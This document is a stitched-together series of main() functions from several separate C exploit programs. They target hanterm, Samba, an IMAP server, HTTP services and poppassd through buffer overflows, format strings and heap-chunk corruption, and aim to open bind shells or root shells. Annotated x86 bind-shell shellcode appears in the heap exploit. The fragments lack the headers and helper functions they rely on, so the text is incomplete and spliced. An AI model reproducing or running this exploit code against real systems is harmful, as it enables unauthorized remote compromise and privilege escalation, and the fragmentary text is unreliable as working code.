main(int argc, char *argv[]) {
int rufp, fpru, jobst,
ferbuf, num=DFBUF,
ofs=DFOFS;
long addr;
char buffer[2000],
hoip[] = DFIP;
extern char *optarg;
banrl();
while ((jobst = getopt(argc, argv, "a:o:b:")) !=EOF)
switch (jobst) {
case 'a': strcpy(hoip, optarg);
break;
case 'o': ofs = atoi(optarg);
break;
case 'b': num = atoi(optarg);
break;
case '?': usages(argv[0]);
exit(0);
}
printf(" Display HOST_IP: %s\n",hoip);
addr = sp() +ofs; // -ofs;
printf(" Jumping Address: %p\n\n",addr);
ferbuf = num - sizeof(shellcode) -4;
bzero(&buffer,2000);
for(rufp=0; rufp<=ferbuf; rufp++) {
buffer[rufp] = NOP;
}
for(fpru=0; fpru<=52; fpru++) {
buffer[rufp++] = shellcode[fpru];
}
buffer[rufp++] = addr & 0xff;
buffer[rufp++] = addr>> 8 & 0xff;
buffer[rufp++] = addr>>16 & 0xff;
buffer[rufp++] = addr>>24 & 0xff;
execl("/usr/X11R6/bin/hanterm", "hanterm",
"-display", hoip, "-fn", buffer, NULL);
exit(0);
}
int main(int argc,char *argv[])
{
int sock,whtl,type=0,brute_f=0;
char tg_host[0x82]="localhost";
u_long shell=plat[type].shell;
(void)banrl();
if(argc<2)
{
(void)usage(argv[0]);
}
while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
{
extern char *optarg;
switch(whtl)
{
case 'H':
case 'h':
memset((char *)tg_host,0,sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'S':
case 's':
shell=strtoul(optarg,0,0);
break;
case 'T':
case 't':
if((type=atoi(optarg))>1)
{
(void)usage(argv[0]);
}
else shell=plat[type].shell;
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case 'B':
case 'b':
brute_f++;
break;
case '?':
fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
if(brute_f)
{
fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
fprintf(stdout," [*] Brute-Force mode:\n\n");
fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
fprintf(stdout,"\n |");
for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
{
fflush(stdout);
fprintf(stdout,"=");
shell+=(0x100);
sock=(int)setsock(tg_host,ATK_PORT);
if((int)re_connt(sock,0)==-1)
{
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
__atk_code_send_recv(sock,shell);
close(sock);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
if((int)re_connt(sock,0)==-1)
{
continue;
}
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stdout," [+] Shellcode address: %p\n",shell);
fprintf(stdout," [*] Brute-Force end !!\n\n");
fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
(void)send_recv_sh(sock);
}
fprintf(stdout,"|\n\n **\n");
fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
exit(-1);
}
else
{
fprintf(stdout," [0] Target: %s\n",plat[type].ost);
fprintf(stdout," [1] Set socket.\n");
sock=(int)setsock(tg_host,ATK_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [2] Make shellcode & Send Packet.\n");
__atk_code_send_recv(sock,shell);
close(sock);
fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
(void)send_recv_sh(sock);
}
}
int main(int argc,char *argv[])
{
int sock,type=0;
int port=(PORT);
char host[256]=DEF_HOST;
int sflag=platform[type].sflag;
unsigned long retloc=platform[type].dtors_addr;
unsigned long shell=platform[type].shell;
(void)banrl();
while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
extern char *optarg;
switch(sock) {
case 'D':
case 'd':
__debug_chk=1;
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
shell=strtoul(optarg,NULL,0);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'T':
case 't':
type=atoi(optarg);
if(type>=4){
(void)usage(argv[0]);
} else {
retloc=platform[type].dtors_addr;
shell=platform[type].shell;
sflag=platform[type].sflag;
}
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
fprintf(stdout," #\n # target host: %s:%d\n",host,port);
fprintf(stdout," # type: %s\n",platform[type].os_type);
switch(type)
{
case 0:
case 1:
(int)make_fmt_code(retloc,shell,sflag);
break;
case 2:
(int)make_bof_code(shell,sflag,0);
break;
case 3:
(int)make_bof_code(shell,sflag,1);
}
fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
sock=setsock(host,port);
(void)re_connt(sock);
if(__debug_chk) sleep(10);
send(sock,t_atk,strlen(t_atk),0);
close(sock);
fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
sleep(1);
sock=setsock(host,36864);
(void)re_connt(sock);
fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
(void)conn_shell(sock);
}
int main(int argc,char *argv[])
{
int port=D_PORT;
char hostname[0x333]=D_HOST;
int whlp,type=0;
unsigned int i=0;
char buf[BUFSIZE+1];
char buf2[BUFSIZE2+1];
char sendbuf[BUFSIZE3+1];
int sd;
u_long retaddr=__pl_form[type].retaddr;
(void)banrl();
while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)
{
extern char *optarg;
switch(whlp)
{
case 'T':
case 't':
if((type=atoi(optarg))<6)
{
retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]);
break;
case 'H':
case 'h':
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);
case '?':
(void)x_fp_rm_usage(argv[0]);
break;
}
}
if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]);
}
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}
fprintf(stdout," [1] #1 Set codes.\n");
memset(buf, 0x90, BUFSIZE);
memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));
memset(buf2,0x90,88);
memcpy(buf2+88,shell, sizeof(shell));
snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent:
%s\r\n\r\n",buf,buf2);
fprintf(stdout," [1] #1 Set socket.\n");
sd=sock_connect(hostname,port);
fprintf(stdout," [1] #1 Send codes.\n");
write(sd,sendbuf,BUFSIZE3);
close(sd);
sleep(1);
fprintf(stdout," [1] #3 Get shell.\n");
getshell(hostname,26112);
exit(0);
}
int main(int argc,char *argv[])
{
int at_sock;
int ts_sock;
int port=PORT;
int roup;
char ttatk_code[36864];
char hostname[0x82]=HOST;
char main_str[] = /* BIND SHELL ON PORT TCP/36864 */
//------------------- main: -------------------//
"\xeb\x72" /* jmp callz */
//------------------- start: ------------------//
"\x5e" /* popl %esi */
//------------------ socket() -----------------//
"\x29\xc0" /* subl %eax, %eax */
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
"\x40" /* incl %eax */
"\x89\xc3" /* movl %eax, %ebx */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x40" /* incl %eax */
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------- bind() ------------------//
"\x43" /* incl %ebx */
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
"\x88\x46\x08" /* movb %al, 0x08(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x89\xc2" /* movl %eax, %edx */
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
"\xb0\x90" /* movb $0x90, %al */
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------ listen() -----------------//
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
"\x43" /* incl %ebx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
//------------------ accept() -----------------//
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
"\xb0\x66" /* movb $0x66, %al */
"\x43" /* incl %ebx */
"\xcd\x80" /* int $0x80 */
//---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
"\x86\xc3" /* xchgb %al, %bl */
"\xb0\x3f" /* movb $0x3f, %al */
"\x29\xc9" /* subl %ecx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
//------------------ execve() -----------------//
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
"\xb0\x0b" /* movb $0x0b, %al */
"\xcd\x80" /* int $0x80 */
//------------------- callz: ------------------//
"\xe8\x89\xff\xff\xff" /* call start */
"/bin/sh"; /* 128byte */
#define plus_4str(x0x) x0x+=4
int x0x_num=0;
int x0x_size=0;
#define BUF_LEN 1024
char *debug_test;
char code_128len[BUF_LEN];
char x82_16x0x[]={ /* 16byte */
0x82,0x82,0x82,0x82,0x82,
0x82,0x82,0x82,0x82,0x82,
0x82,0x82,0x82,0x82,0x82,
0x82
};
char nop_n_jump[4]={0x41,0xeb,0x0c,0x42};
int nop_12jump=0;
int ok_cont=0;
int target_type_number=0;
char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */
char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */
char atk_chunk[BUF_LEN];
unsigned long retloc=pl_form[target_type_number].retloc;
unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr;
memset(ttatk_code,0x00,36864);
memset(atk_chunk,0x00,BUF_LEN);
memset(code_128len,0x00,BUF_LEN);
(void)banrl(argv[0]);
while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF)
{
switch(roup)
{
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
retaddr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
memset(hostname,0x00,0x82);
strncpy(hostname,optarg,0x82);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case '?':
(void)usage(argv[0]);
break;
}
}
//--- make fake chunk ---//
fprintf(stdout," [1] Make fake chunk.\n");
for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++)
atk_chunk[x0x_num]=x82_16x0x[x0x_num];
*(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P)
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer
plus_4str(x0x_num);
*(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer
plus_4str(x0x_num);
//--- make code ---//
fprintf(stdout," [2] Make shellcode.\n");
for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump))
*(long*)&code_128len[nop_12jump]=0x41eb0c42;
for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++)
code_128len[ok_cont++]=main_str[x0x_num];
//--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---//
snprintf(ttatk_code,36864,
"%s%s%s\r\n",atk_chunk,"\x20",code_128len);
fprintf(stdout," [3] Send exploit (bindshell) code.\n");
{ // Try two times connections. It's Point. :-)
/* 1 */
at_sock=setsock(hostname,port);
re_conenter(at_sock);
send(at_sock,ttatk_code,strlen(ttatk_code),0);
close(at_sock);
/* 2 */
at_sock=setsock(hostname,port);
re_conenter(at_sock);
send(at_sock,ttatk_code,strlen(ttatk_code),0);
}
fprintf(stdout," [4] Waiting, executes the shell !\n");
sleep(3);
fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
/* 3 */
ts_sock=setsock(hostname,36864);
re_conenter(ts_sock);
fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
// Execute bash shell
getshell(ts_sock);
}
int main(int argc,char *argv[]){
int sflag=DF_SFLAG;
unsigned long do_system_addr=DO_SYSTEM;
unsigned long retloc=DTOR_END_ADDR;
unsigned long shaddr=SHELL;
char host[256]=DEF_STR;
int port=PORT;
extern char *optarg;
int sock,i,r=0;
char buf[1024];
char user[256]=DEF_STR;
char pass[256]=DEF_STR;
char *ptr=NULL;
char xhost_ip_buf[256]=XHOST_IP;
get_10_ip(xhost_ip_buf);
memset((char *)buf,0,sizeof(buf));
memset((char *)user,0,sizeof(user));
memset((char *)pass,0,sizeof(pass));
(void)banrl();
while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){
switch(sock){
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'D':
case 'd':
do_system_addr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'I':
case 'i':
memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf));
strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1);
get_10_ip(xhost_ip_buf);
break;
case 'U':
case 'u':
memset((char *)user,0,sizeof(user));
strncpy(user,optarg,sizeof(user)-1);
break;
case 'S':
case 's':
memset((char *)pass,0,sizeof(pass));
strncpy(pass,optarg,sizeof(pass)-1);
break;
case '?':
default:
(void)usage(argv[0]);
break;
}
}
if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){
(void)usage(argv[0]);
}
fprintf(stdout," [+] make socket.\n");
fprintf(stdout," [+] host: %s.\n",host);
fprintf(stdout," [+] port: %d.\n",port);
sock=setsock(host,port);
re_connt(sock);
recv(sock,buf,sizeof(buf)-1,0);
if(strstr(buf,"IMAP4rev1")){
fprintf(stdout," [+] OK, IMAP4rev1.\n");
}
else {
fprintf(stdout," [-] Ooops, no match.\n\n");
close(sock);
exit(-1);
}
memset((char *)buf,0,sizeof(buf));
snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass);
send(sock,buf,strlen(buf),0);
memset((char *)buf,0,sizeof(buf));
while(recv(sock,buf,sizeof(buf)-1,0)){
if(strstr(buf," Completed")){
fprintf(stdout," [+] login completed.\n");
break;
}
else if(strstr(buf," rejected")){
fprintf(stdout," [-] login failed.\n\n");
exit(-1);
}
}
memset((char *)buf,0,sizeof(buf));
snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n");
send(sock,buf,strlen(buf),0);
memset((char *)buf,0,sizeof(buf));
while(recv(sock,buf,sizeof(buf)-1,0)){
if(strstr(buf," Completed")){
fprintf(stdout," [+] select success.\n");
break;
}
else if(strstr(buf," NO SELECT")){
fprintf(stdout," [-] select failed.\n\n");
exit(-1);
}
}
/* get, do_system address */
fprintf(stdout," [+] find do_system address.\n");
memset((char *)buf,0,sizeof(buf));
snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG);
send(sock,buf,strlen(buf),0);
memset((char *)buf,0,sizeof(buf));
recv(sock,buf,sizeof(buf)-1,0);
if(strstr(buf,"|")){
ptr=(char *)strstr(buf,"|");
sscanf(ptr,"|%x|\n",&do_system_addr);
}
do_system_addr-=DEF_DO_SYSTEM_OFFSET;
fprintf(stdout," [+] make exploit code.\n");
fprintf(stdout," [+] retloc address: %p.\n",retloc);
fprintf(stdout," [+] do_system address: %p.\n",do_system_addr);
fprintf(stdout," [+] send exploit code.\n");
send_exploit_code(sock,retloc,do_system_addr,sflag);
for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){
send_exploit_code(sock,retloc+r,xterm_shell[i],sflag);
}
#define LOGOUT_CMD "1 logout\n"
send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0);
sleep(1);
recv(sock,buf,sizeof(buf)-1,0);
close(sock);
if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){
fprintf(stdout," [+] logout success.\n\n");
}
else {
fprintf(stdout," [-] logout failed.\n\n");
exit(-1);
}
exit(0);
}
int main(int argc,char *argv[])
{
int port=D_PORT;
char hostname[0x333]=D_HOST;
int whlp,type=0;
unsigned int i=0;
char buf[141];
char buf2[2078];
char sendbuf[3150];
char buf3[141];
int sd;
int ftpsd;
u_long retaddr=__pl_form[type].retaddr;
(void)banrl();
while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF)
{
extern char *optarg;
switch(whlp)
{
case 'T':
case 't':
if((type=atoi(optarg))<6)
{
retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]);
break;
case 'H':
case 'h':
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;
case 'u':
if(!user&&!(user=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'a':
if(!pass&&!(pass=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'c':
if(!writedir&&!(writedir=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);
case '?':
(void)x_fp_rm_usage(argv[0]);
break;
}
}
if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]);
}
else
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}
fprintf(stdout," [1] #1 Set codes.\n");
ftpsd=sock_connect(hostname,21);
ftp_parse(ftpsd);
memset(buf3,0x42,141);
memset(buf2,0x90,1000);
memcpy(buf2+1000,shell,strlen(shell));
memset(buf2+1000+strlen(shell),0x90,1000);
snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2);
fprintf(stdout," [1] #1 Set socket.\n");
sd=sock_connect(hostname,port);
fprintf(stdout," [1] #1 Send codes.\n");
write(sd,sendbuf,3150);
close(sd);
sleep(10);
fprintf(stdout," [1] #3 Get shell.\n");
getshell(hostname,26112);
exit(0);
}
int main(int argc, char *argv[])
{
int whtl;
char user_id[BUF_SZ]=D_NAME;
char passwd[BUF_SZ]=D_NAME;
char tg_path[BUF_SZ]=D_POPPASS;
char df_sh[BUF_SZ]=D_SHELL;
(void)banrl();
while((whtl=getopt(argc,argv,"U:u:P:p:T:t:Hh"))!=-1)
{
extern char *optarg;
switch(whtl)
{
case 'U':
case 'u':
memset((char *)user_id,0,sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;
case 'P':
case 'p':
memset((char *)passwd,0,sizeof(passwd));
strncpy(passwd,optarg,sizeof(passwd)-1);
break;
case 'T':
case 't':
memset((char *)tg_path,0,sizeof(tg_path));
strncpy(tg_path,optarg,sizeof(tg_path)-1);
break;
case 'H':
case 'h':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
if(!strcmp(user_id,D_NAME)||!strcmp(passwd,D_NAME))
{
(void)usage(argv[0]);
exit(-1);
}
else
{
char comm[1024];
int out[2],in[2];
if(((int)m_sh())==-1)
{
fprintf(stdout," [-] exploit failed.\n\n");
exit(-1);
}
if(pipe(out)==-1)
{
perror(" [-] pipe() error");
exit(-1);
}
if(pipe(in)==-1)
{
perror(" [-] pipe() error");
exit(-1);
}
switch(fork())
{
case -1:
perror(" [-] fork() error");
break;
case 0:
close(out[0]);
close(in[1]);
dup2(out[1],STDOUT_FILENO);
dup2(in[0],STDIN_FILENO);
execl(tg_path,tg_path,"-s",D_EXEC,0);
break;
default:
close(out[1]);
close(in[0]);
fprintf(stdout," [+] execute poppassd.\n");
memset((char *)comm,0,sizeof(comm));
read(out[0],comm,sizeof(comm)-1);
fprintf(stdout," %s",comm);
memset((char *)comm,0,sizeof(comm));
snprintf(comm,sizeof(comm)-1,"user %s\r\n",user_id);
fprintf(stdout," [+] input username.\n");
write(in[1],comm,strlen(comm));
memset((char *)comm,0,sizeof(comm));
read(out[0],comm,sizeof(comm)-1);
fprintf(stdout," %s",comm);
memset((char *)comm,0,sizeof(comm));
snprintf(comm,sizeof(comm)-1,"pass %s\r\n",passwd);
fprintf(stdout," [+] input password.\n");
write(in[1],comm,strlen(comm));
memset((char *)comm,0,sizeof(comm));
read(out[0],comm,sizeof(comm)-1);
fprintf(stdout," %s",comm);
memset((char *)comm,0,sizeof(comm));
snprintf(comm,sizeof(comm)-1,"newpass %s\r\n",passwd);
fprintf(stdout," [+] input fake new password.\n");
write(in[1],comm,strlen(comm));
close(out[0]);
close(in[1]);
break;
}
fprintf(stdout," [+] wait, 2sec.\n");
sleep(2);
if((stat(D_SHELL,&ss)==0)&&(ss.st_mode&S_ISUID))
{
fprintf(stdout," [+] Ok, exploited successfully.\n");
fprintf(stdout," [*] It's Rootshell !\n\n");
unlink(D_EXEC);
execl(D_SHELL,D_SHELL,0);
}
else
{
fprintf(stdout," [-] exploit failed.\n\n");
exit(-1);
}
}
}